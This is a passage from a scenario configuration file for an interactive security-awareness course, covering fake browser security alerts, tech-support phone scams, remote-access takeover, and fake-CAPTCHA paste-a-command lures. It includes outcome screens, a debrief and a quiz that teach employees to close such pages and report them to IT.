    { id: "cfx_title_bar", type: "title", title: "Wednesday · 18:42", autoAdvanceMs: 3200, guide: { title: "At the bar", body: "Alex opens a laptop to check a dinner receipt." } },
    { id: "cfx_cam_laptop", type: "camera", waypointId: "wp_cfx_bar_laptop", guide: { title: "The counter laptop", body: "Alex's laptop on the bar." } },
    { id: "cfx_scare_beat", type: "device", deviceId: "cfx_scare", screen: "on", guide: { title: "Open the receipt", body: "Click Browser on the laptop." }, completeOn: { action: "continue" } },
    { id: "cfx_call_beat", type: "device", deviceId: "cfx_call", guide: { title: "Calling support", body: "You dialled the number. Listen." }, completeOn: { action: "continue" } },
    { id: "cfx_remote_beat", type: "device", deviceId: "cfx_remote", screen: "on", guide: { title: "The support session", body: "Kevin wants to connect to the laptop." }, completeOn: { action: "continue" } },
    { id: "cfx_takeover_beat", type: "device", deviceId: "cfx_takeover", guide: { title: "Remote control", body: "Watch what the 'technician' does." }, completeOn: { action: "continue" } },
    {
      id: "cfx_teach_bar_bad",
      type: "teach",
      teach: {
        outcome: "risky",
        body: "The alert was a web page dressed up as Windows, and the phone number was the trap. Real Microsoft and Windows warnings never show a number. Calling put you straight through to the scammer, and Allow handed over the laptop.",
        spot: ["A fullscreen browser warning you cannot easily close", "A phone number in a 'security' alert", "A caller who wants to control your device"],
        protect: ["No real warning has a phone number: close the tab", "Never call numbers from pop-ups", "Report it, and if you let someone in, tell IT at once"],
        remember: "A browser pop-up with a phone number is a scam. The number itself is the attack.",
        continueLabel: "Continue",
      },
    },
    {
      id: "cfx_teach_bar_safe",
      type: "teach",
      teach: {
        outcome: "safe",
        whatIf: "If Alex had called and allowed the session",
        body: "A real Windows or Microsoft warning never shows a phone number, and a web page cannot lock your computer. The number was there to put you through to the scammer.",
        spot: ["A fullscreen browser warning you cannot easily close", "A phone number in a 'security' alert", "A caller who wants to control your device"],
        protect: ["No real warning has a phone number: close the tab", "Never call numbers from pop-ups", "Report it to IT"],
        remember: "A browser pop-up with a phone number is a scam. The number itself is the attack.",
        continueLabel: "See what would have happened",
      },
    },
    { id: "cfx_remote_replay_beat", type: "device", deviceId: "cfx_remote_replay", screen: "on", forced: true, whatIfNote: REPLAY_NOTE, guide: { title: "What would have happened", body: "Connect and allow the session." }, completeOn: { action: "continue" } },
    { id: "cfx_takeover_replay_beat", type: "device", deviceId: "cfx_takeover", forced: true, whatIfNote: "If Alex had clicked Allow, the scammer would have done this.", guide: { title: "What would have happened", body: "Watch what the 'technician' would have done." }, completeOn: { action: "continue" } },

    // ---- Act 5: beach iPad recognition
    { id: "cfx_cut_beach", type: "camera", waypointId: "wp_cfx_beach", environmentId: "beach", fadeCut: true, endsWhatIf: true, guide: { title: "A few days later", body: "On holiday, phone and tablet in hand." } },
    { id: "cfx_title_beach", type: "title", title: "The scam travels with you", autoAdvanceMs: 3200, guide: { title: "The scam travels", body: "The same tricks appear on your own devices." } },
    { id: "cfx_ipad_beat", type: "device", deviceId: "cfx_ipad", guide: { title: "A hotel deal", body: "A travel page wants you to allow notifications, and a support chat pops up." }, completeOn: { action: "continue" } },
    {
      id: "cfx_teach_ipad",
      type: "teach",
      teach: {
        outcome: "recap",
        body: "A tablet cannot do the Win+R trick, but the psychology is the same: fake urgency, a fake fix, a fake helper. Nothing on a web page needs you to allow, install or call anything just to keep reading.",
        spot: ["\u201cAllow notifications to continue\u201d", "A support chat that pops up uninvited", "\u201cYour session expired, install a profile\u201d"],
        protect: ["Close the page", "Do not install profiles from web pages", "Go to the real app or vendor site yourself"],
        remember: "Same trick, any device: fake urgency, fake fix, fake support.",
        continueLabel: "Continue",
      },
    },

    // ---- Act 6: attacker wrap-up + ending
    { id: "cfx_cut_hacker2", type: "camera", waypointId: "wp_cfx_hacker", environmentId: "hacker", fadeCut: true, alertSfx: true, whatIfNote: REPLAY_NOTE, guide: { title: "Meanwhile", body: "Back on the attacker's side." } },
    { id: "cfx_title_hacker2", type: "title", title: "The attacker's side", kicker: "Attacker view", autoAdvanceMs: 3400, whatIfNote: REPLAY_NOTE, guide: { title: "The attacker's side", body: "How the whole day looked to them." } },
    { id: "cfx_push2", type: "camera", waypointId: "wp_cfx_hacker_laptop", whatIfNote: REPLAY_NOTE, guide: { title: "The attacker's laptop", body: "The operation log." } },
    { id: "cfx_dash_attack_beat", type: "device", deviceId: "cfx_dash_attack", whatIfNote: REPLAY_NOTE, guide: { title: "Attacker view", body: "Listen, then click Continue." }, completeOn: { action: "continue" } },
    { id: "cfx_dash_result_beat", type: "device", deviceId: "cfx_dash_result", whatIfNote: REPLAY_NOTE, guide: { title: "Attacker view", body: "Listen, then click Continue." }, completeOn: { action: "continue" } },
    {
      id: "cfx_teach_compromised",
      type: "teach",
      teach: {
        outcome: "risky",
        body: "The browser was never broken. Either a command you pasted, or a remote session you allowed, let the attacker in. What matters now is speed.",
        spot: ["A web page telling you to run a command", "A pop-up with a phone number", "A caller asking to control your device"],
        protect: ["Tell IT straight away, even if you only suspect it", "Disconnect from the network if you were asked to", "IT resets credentials and checks what was accessed"],
        remember: "If you already did it, stop and report fast. Speed limits the damage.",
        continueLabel: "Report it to IT",
      },
    },
    {
      id: "cfx_teach_unresolved",
      type: "teach",
      teach: {
        outcome: "safe",
        heading: {
          eyebrow: "STOPPED, BUT NOT REPORTED",
          title: "You did not fall for it. Nobody else knows yet.",
          spotEyebrow: "WHAT YOU SAW",
          spotTitle: "The lures today",
          protectEyebrow: "STILL TO DO",
          protectTitle: "Close the loop",
        },
        body: "You did not run anything or let anyone in, so your device is fine. But the same lure is going to the next person. Reporting is how IT blocks the page and warns everyone.",
        spot: ["A fake CAPTCHA wanting Win+R or Terminal", "A fullscreen alert with a phone number", "A caller wanting remote control"],
        protect: ["Report the message and the pages to IT", "IT blocks the domains and the number", "Colleagues get warned about the same lure"],
        remember: "Spotting it protects you. Reporting it protects everyone.",
        continueLabel: "Continue",
      },
    },
    { id: "cfx_cam_end_compromised", type: "camera", waypointId: "wp_cfx_terminal", environmentId: "office", fadeCut: true, endsWhatIf: true, walkSfx: true },
    {
      id: "cfx_end_compromised",
      type: "consequence",
      consequence: {
        eyebrow: "OUTCOME",
        kicker: "COMPROMISE · CONTAINED",
        title: "Device compromised",
        cctv: false,
        lines: [
          "Alex reports it to IT the next morning.",
          "IT isolates the laptop, resets Alex's passwords and checks which files and accounts were reached.",
          "Because Alex reported it, the same lure is blocked for everyone else.",
        ],
        continueLabel: "Continue",
      },
    },
    { id: "cfx_cam_end_protected", type: "camera", waypointId: "wp_cfx_terminal", environmentId: "office", fadeCut: true, endsWhatIf: true, walkSfx: true },
    {
      id: "cfx_end_protected",
      type: "consequence",
      consequence: {
        eyebrow: "OUTCOME",
        kicker: "ATTACK PREVENTED",
        title: "Attack prevented",
        cctv: false,
        lines: [
          "Nothing was run and nobody got in.",
          "IT blocked the look-alike domains and the support number, and warned the company.",
          "A fake page and a fake call ran out of road.",
        ],
        continueLabel: "Continue",
      },
    },
    { id: "cfx_cam_end_unresolved", type: "camera", waypointId: "wp_cfx_terminal", environmentId: "office", fadeCut: true, endsWhatIf: true, walkSfx: true },
    {
      id: "cfx_end_unresolved",
      type: "consequence",
      consequence: {
        eyebrow: "OUTCOME",
        kicker: "SPOTTED · NOT REPORTED",
        title: "Spotted, but not reported",
        cctv: false,
        lines: [
          "Alex's device is fine: nothing was run and nobody got in.",
          "Nobody told IT, so the page and the number keep working.",
          "A colleague meets the same lure on Friday.",
        ],
        continueLabel: "Continue",
      },
    },
    {
      id: "cfx_debrief_terminal",
      type: "terminal_debrief",
      terminalDebrief: {
        intro: "Here is what happened, and the four things to remember.",
        continueLabel: "Continue to the quiz",
        topics: [
          {
            id: "cfx_t_captcha",
            dimension: "identity",
            title: "A real CAPTCHA stays in the browser",
            lines: [
              "It proves you are human with a click. It never asks you to open Run, PowerShell or Terminal.",
              "If a page gives you keyboard steps or a command to paste, the page is the attack.",
            ],
          },
          {
            id: "cfx_t_phone",
            dimension: "identity",
            title: "A pop-up phone number is a red flag",
            lines: [
              "Real Microsoft and Windows warnings never show a phone number.",
              "A fullscreen 'your device is infected, call now' page is a scam. Close the tab.",
            ],
          },
          {
            id: "cfx_t_remote",
            dimension: "information",
            title: "Nobody who calls you should control your device",
            lines: [
              "Unexpected 'support' that wants remote access or payment is a scam.",
              "Hang up and reach IT through a channel you already know.",
            ],
          },
          {
            id: "cfx_t_report",
            dimension: "operations",
            title: "If you did it, report fast",
            lines: [
              "Stop, disconnect if you were asked to, and tell IT straight away.",
              "Reporting a page you spotted blocks it for everyone else, too.",
            ],
          },
        ],
      },
    },
    {
      id: "cfx_quiz",
      type: "quiz",
      title: "Check what you learned",
      quiz: [
        {
          id: "q_captcha",
          title: "The verification page",
          prompt: "A page says verification failed and tells you to press Win+R, paste, and press Enter. What is happening?",
          options: [
            { id: "a", label: "A slow CAPTCHA that needs a moment" },
            { id: "b", label: "A trap: it wants you to run a command outside the browser", correct: true },
            { id: "c", label: "A normal browser repair" },
          ],
          rationale: "A real CAPTCHA is one click inside the browser. Steps that open Run or Terminal are the attack.",
        },
        {
          id: "q_paste",
          title: "The clipboard",
          prompt: "You press Ctrl+V in the Run box and a long PowerShell command appears that you never typed. What do you do?",
          options: [
            { id: "a", label: "Press Enter to finish the verification" },
            { id: "b", label: "Close Run, close the tab and report the page", correct: true },
            { id: "c", label: "Edit the command to make it safe" },
          ],
          rationale: "The page copied the command. Running it runs the attacker's code with your rights. Do not run it.",
        },
        {
          id: "q_phone",
          title: "The security alert",
          prompt: "Your browser goes fullscreen with a Windows Security Center alert and a phone number to call. What tells you it is fake?",
          options: [
            { id: "a", label: "It appeared in the browser" },
            { id: "b", label: "Real Microsoft and Windows warnings never show a phone number", correct: true },
            { id: "c", label: "It used a scary red colour" },
          ],
          rationale: "The phone number is the trap. Genuine warnings never ask you to call a number.",
        },
        {
          id: "q_remote",
          title: "The support call",
          prompt: "A 'support technician' asks you to open a website and enter a code so they can fix your laptop. What do you do?",
          options: [
            { id: "a", label: "Enter the code so they can help faster" },
            { id: "b", label: "Hang up and call IT on a number you already know", correct: true },
            { id: "c", label: "Ask them to email instructions instead" },
          ],
          rationale: "That code starts a remote-control session. Nobody who calls you unexpectedly should control your device.",
        },
        {
          id: "q_rule",
          title: "The golden rule",
          prompt: "Which is the clearest sign something is wrong?",
          options: [
            { id: "a", label: "A web page tells you to run commands or call a number to fix your computer", correct: true },
            { id: "b", label: "A page asks you to tick a checkbox" },
            { id: "c", label: "An update offered through the company Software Center" },
          ],
          rationale: "Legitimate fixes never come from a web page telling you to run commands or phone a number.",
        },
        {
          id: "q_report",
          title: "After the fact",
          prompt: "You realise you pasted and ran the command. What is the best next step?",
          options: [
            { id: "a", label: "Wait to see if anything bad happens" },
            { id: "b", label: "Tell IT straight away and disconnect if asked", correct: true },
            { id: "c", label: "Run an antivirus scan and say nothing" },
          ],
          rationale: "Fast reporting lets IT contain it, reset credentials and check what was reached.",
        },
      ],
    },
    { id: "cfx_debrief", type: "debrief", title: "Debrief" },
  ],

  edges: [
    { from: "cfx_intro", to: "cfx_cam_terminal" },
    { from: "cfx_cam_terminal", to: "cfx_terminal_beat" },
    { from: "cfx_terminal_beat", to: "cfx_cam_desk" },
    { from: "cfx_cam_desk", to: "cfx_login_beat" },
    { from: "cfx_login_beat", to: "cfx_intranet_beat" },
    { from: "cfx_intranet_beat", to: "cfx_baseline_beat" },
    { from: "cfx_baseline_beat", to: "cfx_teams_beat" },
    { from: "cfx_teams_beat", to: "cfx_trap_beat" },
    { from: "cfx_trap_beat", to: "cfx_cut_hacker1", on: "ran" },
    { from: "cfx_trap_beat", to: "cfx_teach_trap_safe", on: "closed" },
    { from: "cfx_trap_beat", to: "cfx_teach_trap_safe", on: "reported" },
    { from: "cfx_trap_beat", to: "cfx_teach_trap_safe", on: "verified" },
    { from: "cfx_trap_beat", to: "cfx_teach_trap_safe" },
    { from: "cfx_teach_trap_safe", to: "cfx_trap_replay_beat" },
    { from: "cfx_trap_replay_beat", to: "cfx_cut_hacker1" },
    { from: "cfx_cut_hacker1", to: "cfx_title_hacker1" },
    { from: "cfx_title_hacker1", to: "cfx_push1" },
    { from: "cfx_push1", to: "cfx_dash_trap_beat" },
    { from: "cfx_dash_trap_beat", to: "cfx_teach_trap_bad", on: "ran" },
    { from: "cfx_dash_trap_beat", to: "cfx_cut_bar", on: "replay" },
    { from: "cfx_dash_trap_beat", to: "cfx_cut_bar" },
    { from: "cfx_teach_trap_bad", to: "cfx_cut_bar" },
    { from: "cfx_cut_bar", to: "cfx_title_bar" },
    { from: "cfx_title_bar", to: "cfx_cam_laptop" },
    { from: "cfx_cam_laptop", to: "cfx_scare_beat" },
    { from: "cfx_scare_beat", to: "cfx_call_beat", on: "call" },
    { from: "cfx_scare_beat", to: "cfx_teach_bar_safe", on: "closed" },
    { from: "cfx_scare_beat", to: "cfx_teach_bar_safe", on: "verified" },
    { from: "cfx_scare_beat", to: "cfx_teach_bar_safe" },
    { from: "cfx_call_beat", to: "cfx_remote_beat", on: "comply" },
    { from: "cfx_call_beat", to: "cfx_teach_bar_safe", on: "safe" },
    { from: "cfx_call_beat", to: "cfx_teach_bar_safe" },
    { from: "cfx_remote_beat", to: "cfx_takeover_beat", on: "allowed" },
    { from: "cfx_remote_beat", to: "cfx_teach_bar_safe", on: "denied" },
    { from: "cfx_remote_beat", to: "cfx_teach_bar_safe" },
    { from: "cfx_takeover_beat", to: "cfx_teach_bar_bad" },
    { from: "cfx_teach_bar_bad", to: "cfx_cut_beach" },
    { from: "cfx_teach_bar_safe", to: "cfx_remote_replay_beat" },
    { from: "cfx_remote_replay_beat", to: "cfx_takeover_replay_beat" },
    { from: "cfx_takeover_replay_beat", to: "cfx_cut_beach" },
    { from: "cfx_cut_beach", to: "cfx_title_beach" },
    { from: "cfx_title_beach", to: "cfx_ipad_beat" },
    { from: "cfx_ipad_beat", to: "cfx_teach_ipad" },
    { from: "cfx_teach_ipad", to: "cfx_cut_hacker2" },
    { from: "cfx_cut_hacker2", to: "cfx_title_hacker2" },
    { from: "cfx_title_hacker2", to: "cfx_push2" },
    { from: "cfx_push2", to: "cfx_dash_attack_beat" },
    { from: "cfx_dash_attack_beat", to: "cfx_dash_result_beat" },
    { from: "cfx_dash_result_beat", to: "cfx_teach_compromised", on: "compromised" },
    { from: "cfx_dash_result_beat", to: "cfx_cam_end_protected", on: "protected" },
    { from: "cfx_dash_result_beat", to: "cfx_teach_unresolved", on: "unresolved" },
    { from: "cfx_dash_result_beat", to: "cfx_teach_unresolved" },
    { from: "cfx_teach_compromised", to: "cfx_cam_end_compromised" },
    { from: "cfx_teach_unresolved", to: "cfx_cam_end_unresolved" },
    { from: "cfx_cam_end_compromised", to: "cfx_end_compromised" },
    { from: "cfx_cam_end_protected", to: "cfx_end_protected" },
    { from: "cfx_cam_end_unresolved", to: "cfx_end_unresolved" },
    { from: "cfx_end_compromised", to: "cfx_debrief_terminal" },
    { from: "cfx_end_protected", to: "cfx_debrief_terminal" },
    { from: "cfx_end_unresolved", to: "cfx_debrief_terminal" },
    { from: "cfx_debrief_terminal", to: "cfx_quiz" },
    { from: "cfx_quiz", to: "cfx_debrief" },
  ],
};
